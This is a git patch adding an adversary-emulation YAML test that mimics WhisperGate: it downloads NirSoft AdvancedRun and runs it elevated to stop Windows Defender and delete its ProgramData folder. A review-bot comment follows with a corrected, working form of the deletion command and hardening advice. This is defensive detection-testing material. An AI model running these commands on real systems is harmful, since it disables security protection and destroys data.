From 8cfb6beafc859b92827d7a42fb9b8b03ba7dde92 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Fri, 21 Jan 2022 11:33:08 -0700
Subject: [PATCH] NIRSoft AdvancedRun (#1735)
* NIRSoft AdvancedRun
* Update T1588.002.yaml
* Update T1588.002.yaml
---
 atomics/T1588.002/T1588.002.yaml | 36 ++++++++++++++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 atomics/T1588.002/T1588.002.yaml
diff --git a/atomics/T1588.002/T1588.002.yaml b/atomics/T1588.002/T1588.002.yaml
new file mode 100644
index 00000000..d11cac47
--- /dev/null
+++ b/atomics/T1588.002/T1588.002.yaml
@@ -0,0 +1,36 @@
+attack_technique: T1588.002
+display_name: 'Obtain Capabilities: Tool'
+atomic_tests:
+- name: Run NirSoft AdvancedRun
+ description: |
+ Information on NirSoft AdvancedRun and it's creators found here: http://www.nirsoft.net/utils/advanced_run.html
+ This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
+ Upon successful execution, AdvancedRun.exe will run and stop Defender and attempt to delete the Defender folder on disk.
+ supported_platforms:
+ - windows
+ input_arguments:
+ local_folder:
+ description: Local path of AdvancedRun executable
+ type: Path
+ default: PathToAtomicsFolder\T1588.002\bin\AdvancedRun
+ local_executable:
+ description: name of the advancedrun executable
+ type: String
+ default: 'advancedrun.exe'
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Advancedrun.exe must be located at #{local_folder}\#{local_executable}
+ prereq_command: |
+ if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip"
+ Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force
+ executor:
+ command: |
+ #{local_folder}\#{local_executable} /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
+ #{local_folder}\#{local_executable} "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
+ cleanup_command: |
+ Remove-Item #{local_folder}\#{local_executable} -ErrorAction Ignore
+ name: powershell
+ elevation_required: true
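Review bot: The second executor command passes the powershell.exe path as a bare positional argument, while the first command correctly uses `/EXEFilename "C:\Windows\System32\sc.exe"`; AdvancedRun's documented switch for the target binary is /EXEFilename, so the second invocation most likely never launches powershell and the folder deletion the description promises would not occur — change it to `#{local_folder}\#{local_executable} /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run`. get_prereq_command downloads advancedrun.zip over plain http with no integrity check, and the executor then runs that binary elevated (/RunAs 8, reportedly the TrustedInstaller option, which I have not confirmed against the tool's docs), so a tampered download on the wire would execute with the highest privileges on the host; fetch over https and verify the archive or the extracted exe against a pinned Get-FileHash value before the prereq exits 0. cleanup_command removes only the executable, leaving the rest of the extracted archive in #{local_folder}, WinDefend stopped, and the ProgramData folder deleted; at minimum add `sc.exe start WinDefend` to the cleanup and state in the description that the folder deletion is not reversible, or flag the test as destructive. Also, `it's creators` in the description should read `its creators`.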